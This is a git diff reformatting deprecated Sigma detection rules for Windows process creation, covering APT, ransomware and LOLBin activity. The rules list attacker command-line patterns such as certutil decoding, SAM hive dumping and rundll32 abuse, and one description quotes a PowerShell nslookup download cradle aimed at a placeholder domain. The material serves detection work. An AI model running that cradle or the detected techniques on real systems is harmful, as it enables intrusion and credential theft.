a/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml index d6b4ee1bf..b1778d04c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_gallium.yml @@ -1,11 +1,10 @@ title: GALLIUM Artefacts id: 18739897-21b1-41da-8ee4-5b786915a676 related: - - id: 440a56bf-7873-4439-940a-1c8a671073c2 - type: derived + - id: 440a56bf-7873-4439-940a-1c8a671073c2 + type: derived status: deprecated -description: Detects artefacts associated with activity group GALLIUM - Microsoft - Threat Intelligence Center indicators released in December 2019. +description: Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. references: - https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/ - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml index 588f0c705..547c64747 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_hurricane_panda.yml @@ -20,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - CommandLine|contains|all: - - localgroup - - admin - - /add - - CommandLine|contains: \Win64.exe + - CommandLine|contains|all: + - localgroup + - admin + - /add + - CommandLine|contains: \Win64.exe condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml index 25855dfa1..c98129c2d 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_activity_apr21.yml @@ -1,8 +1,7 @@ title: Lazarus Activity Apr21 id: 4a12fa47-c735-4032-a214-6fab5b120670 status: deprecated -description: Detects different process creation events as described in Malwarebytes's - threat report on Lazarus group activity +description: Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity references: - https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ author: Bhabesh Raj @@ -21,11 +20,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains|all: - - mshta + CommandLine|contains|all: + - mshta # Covered by cc7abbd0-762b-41e3-8a26-57ad50d2eea3 - .zip selection_2: - ParentImage: C:\Windows\System32\wbem\wmiprvse.exe + ParentImage: C:\Windows\System32\wbem\wmiprvse.exe # Covered by 8a582fe2-0882-4b89-a82a-da6b2dc32937 Image: C:\Windows\System32\mshta.exe selection_3: ParentImage|contains: :\Users\Public\ diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml index 4063dea8f..fe9c11e3d 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_lazarus_loader.yml @@ -1,8 +1,7 @@ title: Lazarus Loaders id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e status: deprecated -description: Detects different loaders as described in various threat reports on Lazarus - group activity +description: Detects different loaders as described in various threat reports on Lazarus group activity references: - https://www.hvs-consulting.de/lazarus-report/ - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ @@ -22,27 +21,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd1: - CommandLine|contains|all: + CommandLine|contains|all: - 'cmd.exe /c ' - ' -p 0x' selection_cmd2: - CommandLine|contains: + CommandLine|contains: - C:\ProgramData\ - C:\RECYCLER\ selection_rundll1: - CommandLine|contains|all: + CommandLine|contains|all: - 'rundll32.exe ' - C:\ProgramData\ selection_rundll2: - CommandLine|contains: + CommandLine|contains: - .bin, - .tmp, - .dat, - .io, - .ini, - .db, - condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 - and selection_rundll2 )) + condition: process_creation and (( selection_cmd1 and selection_cmd2 ) or ( selection_rundll1 and selection_rundll2 )) falsepositives: - Unknown level: critical diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml index 7fa25ddd2..f0caf955c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_muddywater_dnstunnel.yml @@ -24,7 +24,7 @@ detection: - \powershell.exe - \pwsh.exe ParentImage|endswith: \excel.exe - CommandLine|contains: DataExchange.dll + CommandLine|contains: DataExchange.dll condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml b/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml index 39d3a4502..eda66fb7d 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_apt_ta505_dropper.yml @@ -1,8 +1,7 @@ title: TA505 Dropper Load Pattern id: 18cf6cf0-39b0-4c22-9593-e244bdc9a2d4 status: deprecated -description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious - documents +description: Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents references: - https://twitter.com/ForensicITGuy/status/1334734244120309760 author: Florian Roth (Nextron Systems) @@ -23,8 +22,8 @@ detection: selection_parent: ParentImage|endswith: \wmiprvse.exe selection_mshta: - - Image|endswith: \mshta.exe - - OriginalFileName: mshta.exe + - Image|endswith: \mshta.exe + - OriginalFileName: mshta.exe condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml b/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml index 374031848..99b469a1f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_certutil_susp_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Certutil Command Usage id: e011a729-98a6-4139-b5c4-bf6f6dd8239a status: deprecated -description: Detects a suspicious Microsoft certutil execution with sub commands like - 'decode' sub command, which is sometimes used to decode malicious code +description: Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code references: - https://twitter.com/JohnLaTwC/status/835149808817991680 - https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/ @@ -33,10 +32,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \certutil.exe - - OriginalFileName: CertUtil.exe + - Image|endswith: \certutil.exe + - OriginalFileName: CertUtil.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - ' -decode ' - ' -decodehex ' - ' -urlcache ' @@ -54,7 +53,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment level: high ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml b/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml index a44772d39..4064e2984 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_cmd_read_contents.yml @@ -19,17 +19,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cmd: - - OriginalFileName: Cmd.Exe - - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe selection_read: - - ParentCommandLine|contains|all: - - cmd - - '/r ' - - < - - CommandLine|contains|all: - - cmd - - '/r ' - - < + - ParentCommandLine|contains|all: + - cmd + - '/r ' + - < + - CommandLine|contains|all: + - cmd + - '/r ' + - < condition: process_creation and (all of selection_*) falsepositives: - Legitimate use diff --git a/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml b/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml index 7c2e4dbf9..0a9825b39 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_cmd_redirect_to_stream.yml @@ -1,8 +1,7 @@ title: Cmd Stream Redirection id: 70e68156-6571-427b-a6e9-4476a173a9b6 status: deprecated -description: Detects the redirection of an alternate data stream (ADS) of / within - a Windows command line session +description: Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt author: frack113 @@ -21,11 +20,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - '> ' - ':' filter: - CommandLine|contains: ' :\' + CommandLine|contains: ' :\' condition: process_creation and (selection and not filter) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml b/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml index e4cdbf74c..c50ec5a81 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_credential_acquisition_registry_hive_dumping.yml @@ -19,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - - Image|endswith: \reg.exe - - OriginalFileName: reg.exe + - Image|endswith: \reg.exe + - OriginalFileName: reg.exe selection_2: - CommandLine|contains: + CommandLine|contains: - ' save ' - ' export ' selection_3: - CommandLine|contains: + CommandLine|contains: - hklm\sam - hklm\security - HKEY_LOCAL_MACHINE\SAM diff --git a/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml b/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml index 5751e6f82..f50fbcb8c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_cscript_vbs.yml @@ -19,14 +19,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_exe: - - OriginalFileName: - - cscript.exe - - wscript.exe - - Image|endswith: - - \cscript.exe - - \wscript.exe + - OriginalFileName: + - cscript.exe + - wscript.exe + - Image|endswith: + - \cscript.exe + - \wscript.exe selection_script: - CommandLine|contains: .vbs + CommandLine|contains: .vbs condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml b/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml index ce66f3bfa..0f9276fb0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml @@ -1,14 +1,12 @@ title: Execution via MSSQL Xp_cmdshell Stored Procedure id: 344482e4-a477-436c-aa70-7536d18a48c7 related: - - id: d08dd86f-681e-4a00-a92c-1db218754417 - type: derived - - id: 7f103213-a04e-4d59-8261-213dddf22314 - type: derived + - id: d08dd86f-681e-4a00-a92c-1db218754417 + type: derived + - id: 7f103213-a04e-4d59-8261-213dddf22314 + type: derived status: deprecated -description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users - may attempt to elevate their privileges by using xp_cmdshell, which is disabled - by default. +description: Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. references: - https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html author: Tim Rauch @@ -26,8 +24,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - Image|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_parent: ParentImage|endswith: \sqlservr.exe condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml b/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml index b69bc7093..a9ed2733f 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_indirect_cmd.yml @@ -1,8 +1,7 @@ title: Indirect Command Execution id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 status: deprecated -description: Detect indirect command execution via Program Compatibility Assistant - (pcalua.exe or forfiles.exe). +description: Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md - https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html @@ -31,8 +30,7 @@ fields: - ParentCommandLine - CommandLine falsepositives: - - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers - as opposed to commonly seen artifacts. + - Need to use extra processing with 'unique_count' / 'filter' to focus on outliers as opposed to commonly seen artifacts. - Legitimate usage of scripts. level: low ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml b/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml index 2fec4c020..cab49d64c 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_indirect_command_execution_forfiles.yml @@ -1,16 +1,14 @@ title: Indirect Command Exectuion via Forfiles id: a85cf4e3-56ee-4e79-adeb-789f8fb209a8 related: - - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 - type: obsoletes + - id: fa47597e-90e9-41cd-ab72-c3b74cfb0d02 + type: obsoletes status: deprecated -description: Detects execition of commands and binaries from the context of "forfiles.exe". - This can be used as a LOLBIN in order to bypass application whitelisting. +description: Detects execition of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. references: - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a - https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ -author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue - Detections, Endgame), oscd.community +author: Tim Rauch (rule), Elastic (idea), E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community date: 2022/10/17 modified: 2023/01/04 tags: @@ -40,7 +38,7 @@ detection: - ' -m ' filter: Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - xcopy - cmd /c del condition: process_creation and (all of selection_* and not filter) diff --git a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml index 97780489a..18c517882 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_rundll.yml @@ -3,7 +3,7 @@ id: 056a7ee1-4853-4e67-86a0-3fd9ceed7555 status: deprecated description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 #(Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2023/02/21 @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - shell32.dll - shellexec_rundll diff --git a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml index 6ac30c832..284f72b00 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml @@ -21,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - '&&' - rundll32 - shell32.dll - shellexec_rundll - CommandLine|contains: + CommandLine|contains: - value - invoke - comspec diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml index e7ab5ad25..6894ba389 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbas_execution_of_wuauclt.yml @@ -1,8 +1,7 @@ title: Monitoring Wuauclt.exe For Lolbas Execution Of DLL id: ba1bb0cb-73da-42de-ad3a-de10c643a5d0 status: experimental -description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code - execution by specifying an arbitrary DLL. +description: Adversaries can abuse wuauclt.exe (Windows Update client) to run code execution by specifying an arbitrary DLL. references: - https://dtm.uk/wuauclt/ author: Sreeman @@ -16,12 +15,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - wuauclt.exe - /UpdateDeploymentProvider - /Runhandlercomserver filter: - CommandLine|contains: + CommandLine|contains: - wuaueng.dll - UpdateDeploymentProvider.dll /ClassId condition: process_creation and (selection and not filter) diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml index c863269e9..4ec1c05e3 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbin_findstr.yml @@ -1,8 +1,7 @@ title: Abusing Findstr for Defense Evasion id: bf6c39fc-e203-45b9-9538-05397c1b4f3f status: deprecated -description: Attackers can use findstr to hide their artifacts or search specific - strings and evade defense mechanism +description: Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism references: - https://lolbas-project.github.io/lolbas/Binaries/Findstr/ - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ @@ -25,27 +24,26 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_findstr: - - CommandLine|contains: findstr - - Image|endswith: findstr.exe - - OriginalFileName: FINDSTR.EXE + - CommandLine|contains: findstr + - Image|endswith: findstr.exe + - OriginalFileName: FINDSTR.EXE selection_cli_download_1: - CommandLine|contains: + CommandLine|contains: - ' /v ' - ' -v ' selection_cli_download_2: - CommandLine|contains: + CommandLine|contains: - ' /l ' - ' -l ' selection_cli_creds_1: - CommandLine|contains: + CommandLine|contains: - ' /s ' - ' -s ' selection_cli_creds_2: - CommandLine|contains: + CommandLine|contains: - ' /i ' - ' -i ' - condition: process_creation and (selection_findstr and (all of selection_cli_download* - or all of selection_cli_creds*)) + condition: process_creation and (selection_findstr and (all of selection_cli_download* or all of selection_cli_creds*)) falsepositives: - Administrative findstr usage level: medium diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml index b9950f903..d10c7cbba 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbin_office.yml @@ -1,8 +1,7 @@ title: Suspicious File Download Using Office Application id: 0c79148b-118e-472b-bdb7-9b57b444cc19 status: test -description: Detects the usage of one of three Microsoft office applications (Word, - Excel, PowerPoint) to download arbitrary files +description: Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/ - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/ @@ -27,7 +26,7 @@ detection: - \powerpnt.exe - \winword.exe - \excel.exe - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml index 937e6462a..062c1761a 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbin_rdrleakdiag.yml @@ -21,9 +21,9 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection1: Image|endswith: \rdrleakdiag.exe - CommandLine|contains: /fullmemdmp + CommandLine|contains: /fullmemdmp selection2: - CommandLine|contains|all: + CommandLine|contains|all: - /fullmemdmp - ' /o ' - ' /p ' diff --git a/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml b/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml index 30c5de386..e99ad48ea 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_lolbins_by_office_applications.yml @@ -1,8 +1,7 @@ title: New Lolbin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 status: deprecated -description: This rule will monitor any office apps that spins up a new LOLBin process. - This activity is pretty suspicious and should be investigated. +description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e @@ -10,8 +9,7 @@ references: - https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml - https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A - https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set -author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock - @securepeacock (Update), SCYTHE @scythe_io (Update) +author: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update) date: 2021/08/23 modified: 2023/02/04 tags: @@ -25,6 +23,7 @@ logsource: product: windows category: process_creation detection: + #useful_information: add more LOLBins to the rules logic of your choice. process_creation: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational diff --git a/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml b/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml index c3294165d..07c69aea0 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_mal_ryuk.yml @@ -1,8 +1,8 @@ title: Ryuk Ransomware Command Line Activity id: 0acaad27-9f02-4136-a243-c357202edd74 related: - - id: c37510b8-2107-4b78-aa32-72f251e7a844 - type: similar + - id: c37510b8-2107-4b78-aa32-72f251e7a844 + type: similar status: deprecated description: Detects Ryuk Ransomware command lines references: @@ -25,9 +25,9 @@ detection: Image|endswith: - \net.exe - \net1.exe - CommandLine|contains: stop + CommandLine|contains: stop selection2: - CommandLine|contains: + CommandLine|contains: - samss - audioendpointbuilder - unistoresvc_ diff --git a/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml b/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml index 7029d1345..b39fd23ac 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_malware_trickbot_recon_activity.yml @@ -1,12 +1,10 @@ title: Trickbot Malware Reconnaissance Activity id: 410ad193-a728-4107-bc79-4419789fcbf8 related: - - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 - type: similar + - id: 5cc90652-4cbd-4241-aa3b-4b462fa5a248 + type: similar status: deprecated -description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot - enumerates domain/network topology and executes certain commands automatically - every few minutes. +description: Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. references: - https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/ - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ @@ -27,7 +25,7 @@ detection: selection: ParentImage|endswith: \cmd.exe Image|endswith: \nltest.exe - CommandLine|contains: /domain_trusts /all_trusts + CommandLine|contains: /domain_trusts /all_trusts condition: process_creation and selection falsepositives: - Rare System Admin Activity diff --git a/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml b/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml index cf2a6e786..5dd61c3b8 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_mavinject_proc_inj.yml @@ -21,7 +21,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: ' /INJECTRUNNING ' + CommandLine|contains: ' /INJECTRUNNING ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml b/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml index 233d1dc84..73886f33e 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_msdt_diagcab.yml @@ -1,8 +1,7 @@ title: Execute MSDT.EXE Using Diagcab File id: 6545ce61-a1bd-4119-b9be-fcbee42c0cf3 status: deprecated -description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary - to execute arbitrary commands as seen in CVE-2022-30190 +description: Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 references: - https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0 @@ -22,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \msdt.exe - - OriginalFileName: msdt.exe + - Image|endswith: \msdt.exe + - OriginalFileName: msdt.exe selection_cmd: - CommandLine|contains: + CommandLine|contains: - ' /cab' - ' -cab' condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml b/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml index 2248c657e..c70ee7f1e 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_new_service_creation.yml @@ -21,11 +21,11 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_sc: Image|endswith: \sc.exe - CommandLine|contains|all: + CommandLine|contains|all: - create - binPath selection_posh: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName condition: process_creation and (1 of selection*) diff --git a/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml b/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml index c32b51f80..3988145fe 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_nslookup_pwsh_download_cradle.yml @@ -1,13 +1,12 @@ title: Nslookup PwSh Download Cradle id: 72671447-4352-4413-bb91-b85569687135 status: deprecated -description: This rule tries to detect powershell download cradles, e.g. powershell - . (nslookup -q=txt http://some.owned.domain.com)[-1] +description: This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] references: - https://twitter.com/alh4zr3d/status/1566489367232651264 author: Zach Mathis (@yamatosecurity) date: 2022/09/06 -modified: 2022/12/14 +modified: 2022/12/14 # Deprecation date tags: - attack.command_and_control - attack.t1105 @@ -23,7 +22,7 @@ detection: selection: ParentImage|endswith: \powershell.exe Image|contains: nslookup - CommandLine|contains: '=txt ' + CommandLine|contains: '=txt ' condition: process_creation and selection level: medium ruletype: Sigma diff --git a/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml b/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml index d2fdf2794..46e31a211 100644 --- a/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml +++ b/sigma/sysmon/deprecated/proc_creation_win_odbcconf_susp_exec.yml @@ -22,10 +22,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1_img: - - Image|endswith: \odbcconf.exe - - OriginalFileName: odbcconf.exe + - Image|endswith: \odbcconf.exe + - OriginalFileName: odbcconf.exe selection_1_cli: - CommandLine|contains: + CommandLine|contains: - -a - -f - /a @@ -34,8 +34,8 @@ detection: selection_2_parent: ParentImage|endswith: \odbcconf.exe selection_2_img: - - Image|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - 